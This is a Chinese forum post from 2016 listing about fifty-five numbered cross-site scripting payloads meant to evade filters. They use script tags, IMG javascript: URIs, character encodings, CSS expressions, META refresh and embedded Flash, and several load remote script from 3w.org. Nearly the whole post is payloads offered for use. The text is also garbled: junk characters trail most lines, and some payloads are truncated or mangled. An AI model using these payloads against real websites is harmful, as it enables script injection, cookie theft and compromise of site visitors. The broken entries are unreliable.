(1)普通的XSS JavaScript注入+ a9 m9 D! ^5 e% |) Q* ?3 i8 ]
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ |- F7 X" a6 z, @/ T
(99)另类弹框1 Y. B( Z0 }- A9 O, q
<q/oncut=alert()>1 V" A& U/ t. f, l
<s/onclick=alert()>b5 }& b; D1 X9 O* [4 R
<XSS=" onclick="alert(1)//">clickme</SSX=">
) J# E% i/ q+ ~; Q <zzz onclick=alert`1`>clickme</zzz> - b: A2 j( F( D
<a onclick=alert`1`>clickme</a>
0 p0 C. n# S1 r2 b7 q: o' `3 z<a=">clickme</a=">2 U# T' i* M% d" ?' r+ z& h
<a=">clickme</a>
5 ^' m' x& q5 A<z=">clickme</z=">
8 ~3 h( @! X. J7 A. ~- O* u- }<z onclick=alert`1`>clickme</z>
6 ]$ l3 l& o" }' x( Z
- K( y$ x5 A7 S% E% o& Y1 w(2)IMG标签XSS使用JavaScript命令. j9 m2 L' } V/ n& b4 o( w
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 ^+ Q+ L8 ]+ h, j; n S2 m9 d8 a- S% t' ^& B$ A, z. s
(3)IMG标签无分号无引号2 x+ \. G& ^2 ^- D% S0 \, Z6 l
<IMG SRC=javascript:alert(‘XSS’)>$ L. B. {: Y8 h' m+ _0 c+ ?
: r G2 J" n6 c r c3 D
(4)IMG标签大小写不敏感: P" l3 f! s) ?" u0 l3 A2 W" D
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
g2 o; h8 s6 ~- J8 H! E1 x
( ]$ q2 h0 O. ~9 i. m(5)HTML编码(必须有分号)
& E- c6 V5 z \9 t' `- S- l# Y<IMG SRC=javascript:alert(“XSS”)>3 b" v8 }- E+ }: Y% r% K+ r5 C
6 F9 [6 Q( g# p
(6)修正缺陷IMG标签
: w! g _/ X0 D7 R+ n: g<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 t+ |8 Q! `* n% M2 I1 N
) n4 G. V& D# H
(7)formCharCode标签(计算器)
" [7 G4 r9 L6 g- X2 E: I<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>( U. [2 z% Y# @* }3 D) S+ g
8 ^+ m a: |' L1 a5 A# i$ j
(8)UTF-8的Unicode编码(计算器)1 J/ |9 r; s1 e. S6 s5 ^
<IMG SRC=jav..省略..S')>/ S# J+ e6 D5 \0 b& U4 A
5 M) J G1 u0 X(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 c9 X) P! J3 T7 |" P9 A
<IMG SRC=jav..省略..S')>
2 A. H0 D* N/ u4 v5 T( K( @5 W/ z' _
! ^3 \. F% r* S; |(10)十六进制编码也是没有分号(计算器)
7 W2 F6 r# U; ^+ w# @3 {<IMG SRC=\'#\'" /span>
( T. A7 e: J! Q% g# _0 [/ E4 F- q/ m u
(11)嵌入式标签,将Javascript分开
- K5 q8 i& k& e/ R5 w<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>6 {+ Y5 R+ M8 g. c
5 _' u' M7 H9 T/ L1 ~, O* i6 D
(12)嵌入式编码标签,将Javascript分开5 A# B# R1 ~% M( g
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”># w% l! E$ q3 I5 O1 U
# J2 r( Y+ L# ?' j& F; @(13)嵌入式换行符
; x m* M3 v" E; r$ ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; e( |, d! [5 @! X1 P
' {( p% q$ T: ?, F/ C6 }6 D0 o(14)嵌入式回车
7 K6 F2 L: W: P7 }+ P S1 o<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
& I2 m5 {2 b; F! r' b2 G. H( w( @1 [
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
& N' f- v F" g3 g<IMG SRC=\'#\'" /span>
# s# q9 G9 a3 w! G, d( t$ i3 W& Z" Y4 G
(16)解决限制字符(要求同页面)
/ z6 a% C' x) v4 U5 H<script>z=’document.’</script>/ |2 R% K9 V# W7 u, {. _* W" ]8 X
<script>z=z+’write(“‘</script>
9 u: v N4 D2 ]/ I/ `<script>z=z+’<script’</script>
" [- h" i5 P y6 |<script>z=z+’ src=ht’</script>
+ C0 J: J2 M# z& E1 n: L+ g+ T<script>z=z+’tp://ww’</script>
8 u8 N3 ]1 `$ j" |9 {<script>z=z+’w.shell’</script> ^3 o8 `4 Z% K1 d
<script>z=z+’.net/1.’</script>6 J' T8 y- F; E
<script>z=z+’js></sc’</script> ]% l3 Z& N5 L- l2 M- ~6 m
<script>z=z+’ript>”)’</script>+ h8 d* ]7 w* w3 V
<script>eval_r(z)</script>
. f% t( g- K3 ^$ i4 i" ~" h3 x% s6 w! E' c6 K
(17)空字符
9 O# X2 U$ K" `" u. ]. T* w5 nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% p( w. s9 p8 L5 W1 A5 _5 p/ }, g/ V7 W# I
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
! b: O& e" M1 H6 _perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) b, R# l5 G+ j4 T, O
$ F! k: S! u/ p% B5 S8 n(19)Spaces和meta前的IMG标签
! f4 w0 N- y$ D2 S( [. T' n<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>4 I3 R7 ?9 M# t$ R5 r
0 t9 Y1 {8 S! @# _2 u6 o(20)Non-alpha-non-digit XSS
+ q( U7 g3 q" ]3 v6 Z- S<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>; S! v, Q+ A4 T; [: z2 m" p N
2 g0 f2 D4 a7 }
(21)Non-alpha-non-digit XSS to 2
7 @ @3 N+ Q& E7 x4 ~/ {<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) x( U0 ]% b2 {, c6 K
% g0 W* |1 i- p3 I- k2 Z(22)Non-alpha-non-digit XSS to 3
( N# ~4 h" `: ~<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>. v/ A, f2 v x8 L, h+ ~
+ [7 o9 J6 R; l+ _6 I(23)双开括号
* `5 [# A! M9 [* f" R<<SCRIPT>alert(“XSS”);//<</SCRIPT>' ?& X* y$ F# Q$ ~
. U9 B2 {4 ~) a; U6 c: m' e(24)无结束脚本标记(仅火狐等浏览器)
" l \1 _( R0 J7 k! N<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# b. |+ C- z2 W8 J9 r
1 w$ t9 k, S: a4 _6 s4 a y(25)无结束脚本标记2
5 ]1 ^5 S# F j" D3 j$ C6 L! Q<SCRIPT SRC=//3w.org/XSS/xss.js>
4 \+ Z: G( c0 G/ b# n! v3 A( V7 i; ^8 k
(26)半开的HTML/JavaScript XSS+ H! C5 g( T" l1 z
<IMG SRC=\'#\'" /span>
3 C! p0 u3 i/ Y
5 {) ?- c5 U3 K% r# \" ?2 Z" `(27)双开角括号0 ?- ]6 Y9 F+ F2 ^' `* ]: T* g: ^
<iframe src=http://3w.org/XSS.html <
) C3 q) q! E: T& O& L
6 Z$ O& f, G( X: A5 |, ](28)无单引号 双引号 分号
- ~+ A$ t: H) {- e$ ^<SCRIPT>a=/XSS/, K$ T+ J: y+ Y1 t
alert(a.source)</SCRIPT> j% Y2 d* `% a0 R7 N# W
8 @ H: r( t4 H8 s' G' d
(29)换码过滤的JavaScript3 L+ K. A8 U3 h1 p4 D- f# B. O
\”;alert(‘XSS’);//- }! h% V2 A4 E" K8 D
: S$ w8 r% }4 e4 P8 K
(30)结束Title标签6 l5 p Q2 o9 J. f/ }9 y/ _
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
/ Q) i" D7 l- f3 ^+ \5 B4 i% G4 d) X Z8 M' e; o/ u; d1 L! W O) i7 B( f
(31)Input Image6 E# Y# L# P6 n9 v0 V
<INPUT SRC=\'#\'" /span>) Z6 o6 R; ^4 g4 q0 Y+ V: m2 C
f& J! D2 E) z$ d(32)BODY Image
& Z) L! Y% n. b( M% Q7 D<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
& }9 R1 O) u( e+ @% ~ Z+ ^; ^1 A' f0 H% S3 j3 n( V) \% U
(33)BODY标签
7 o5 k: H" g7 Y m<BODY(‘XSS’)>, t8 c' Q( q: W9 V) r
& J8 u, g4 U) s% ?9 C9 k3 J(34)IMG Dynsrc8 B+ X2 L. ]1 I( ~) t: T
<IMG DYNSRC=\'#\'" /span>
0 f. ^/ }. {- _! I4 v& B, ^% ~1 [) C5 ~% f9 \1 a7 j, p
(35)IMG Lowsrc) i! Z0 r; [* N% @& k
<IMG LOWSRC=\'#\'" /span>
* k. k& X: m C" U) a2 N
. B6 ^5 z- Z: K- i5 M5 O; i(36)BGSOUND, C5 G Z6 V4 J( \
<BGSOUND SRC=\'#\'" /span>
+ C- o k/ J# Z7 i( F) P+ u2 n- Z$ J. \' [; b
(37)STYLE sheet- |5 G& z' J& s
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! y, J! \8 W5 Y7 O% T0 I3 x7 A
" t ^# g7 _4 {
(38)远程样式表
% N: [/ R7 j9 M0 c/ W6 q0 P<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ n0 b; z1 m: a7 R$ D
# @( m1 p1 P5 r b; p
(39)List-style-image(列表式)7 B4 ~; ^: q6 `* w! O. |: q4 z
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS" {7 n, f9 ]3 A! U- c
' |. J" Q6 j- a7 @: U3 w- I8 Z(40)IMG VBscript
& S6 w6 E, h2 ~- h<IMG SRC=\'#\'" /STYLE><UL><LI>XSS* v# D# A- g. z1 a! W6 g( d
( K, b& `+ l7 K* s6 ~(41)META链接url
+ v9 K2 ~ u: z3 J, A% F9 ^$ n* D<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
$ T3 d& m$ o5 u' ]! n
: ?! a. }, T" |1 M$ _(42)Iframe% |' w4 q M3 |1 }# o6 p
<IFRAME SRC=\'#\'" /IFRAME>
( R$ d5 h7 h. ?1 G
7 u# M4 _; Q, } u(43)Frame$ R- u1 b- Z3 O6 ]' ?
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>3 M; a' F, _/ _
& S+ @; Z) S4 C
(44)Table/ n: a7 j7 f! z& T; n
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>0 W) c3 s3 N3 F4 o, M0 @- O# t
* ^3 k" f. k1 W* y0 f) S
(45)TD
) O! |- E# S7 y: }1 D) _% c z% F<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># [/ M0 C( G; C {+ N* e
7 z6 R3 d. E# o(46)DIV background-image
( e) S- @9 \8 j: c- e<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( c3 {2 _0 m2 L- c* V( D2 J& Y3 E9 {7 Z& c/ Y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279), P: t' T9 h6 |
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
( E: [: X( \& x
* Z3 g0 N i' l3 b, k(48)DIV expression, ]9 d1 N- H. {! `* p! s9 @
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
' T4 n: W$ h8 e
+ C4 a1 D- U k" b( V(49)STYLE属性分拆表达/ t' @6 g/ g: R, J% ]0 M0 w
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; T( m- m' a9 i1 M R7 o6 I; `" l* E5 u4 O
(50)匿名STYLE(组成:开角号和一个字母开头)
; _' i# y( s2 L0 w) I7 ?; m& r<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 X4 y' l6 A9 f7 L5 v! K6 [
9 k$ T6 @. t3 G }- ^(51)STYLE background-image* ]! R) h4 y4 w& F
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>) U" v5 U$ }& y; G4 O3 Y* U* N
4 n( s" g& f5 I. l0 l
(52)IMG STYLE方式
6 Q" P4 ~' e: S3 D$ V9 m9 Pexppression(alert(“XSS”))’>$ k0 ~4 I t4 ~5 y6 k
+ _% p. f, M- V8 p5 k- I. ~- ^" b
(53)STYLE background& b4 ?/ X2 s0 ~) d
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; J& |" {0 J& ~5 d! c
# X4 P3 M) S. D( w: c% ~6 N) ?(54)BASE% V5 }1 c) l' @; U8 n
<BASE HREF=”javascript:alert(‘XSS’);//”>
# x4 C; y) n* U" U/ m2 B k0 u* _) C% Q4 z
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
2 N6 @: o/ v0 |) W4 |<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>% `' d. v# A3 f# X
|
发表于 2016-4-28 10:06:15
收藏
支持
反对